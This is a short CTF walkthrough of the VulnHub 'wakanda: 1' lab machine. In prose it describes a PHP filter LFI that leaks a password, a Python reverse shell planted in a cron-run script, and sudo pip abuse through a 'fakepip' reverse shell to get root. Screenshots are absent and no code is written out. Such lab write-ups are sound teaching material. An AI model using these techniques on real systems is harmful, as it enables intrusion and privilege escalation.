wakanda: 1

[ vulnhub  ctf  walkthrough  ]

Goal

3 flags / root

Download

https://www.vulnhub.com/entry/wakanda-1,251/

Walkthrough

nmap
alt text

nmap detailed; ssh on 3333
alt text

showmount gives nothing
alt text

dirb shows fake directories
alt text

also fake secret.txt :)
alt text

default 80
alt text

source default 80 shows hidden code
alt text

hidden link is french version
alt text

knew there was an LFI, but it def took me some time to find
found a great writeup on php://filter for local file inclusion which worked
alt text

putting that same request to curl gives us an easier string to copy
alt text

decoded gives password :)
alt text

with no username, trying the only one found on website works
alt text

ssh into python; break out to shell with some commands
alt text

flag 1 found
alt text

etc/passwd shows other user devops
alt text

per usual; move to /tmp and download python linux priv escalation script
note the interesting test file found owned by devops with relatively current date/time
alt text

searching the output for devops shows writeble file owned by devops in /srv
alt text

viewing file it’s a script that wrote the test file in /tmp
assumption is this file is called every x minutes
alt text

update the script with a python reverse shell to our attacking machine
alt text

nc listener on 443 is connected to after about 5 minutes as devops user
alt text

flag 2 is found
alt text

looking at sudo, pip can be run with no password
alt text

familiar of this, looked up fakepip code, downloaded, and updated
another listener was setup on attacking machine using port 444
alt text

on victim machine download updated python fakepip script and execute
alt text

with listener setup on attacking machine, reverse shell connects and root access acquired
alt text

root flag
alt text

Written on November 10, 2018
Share on: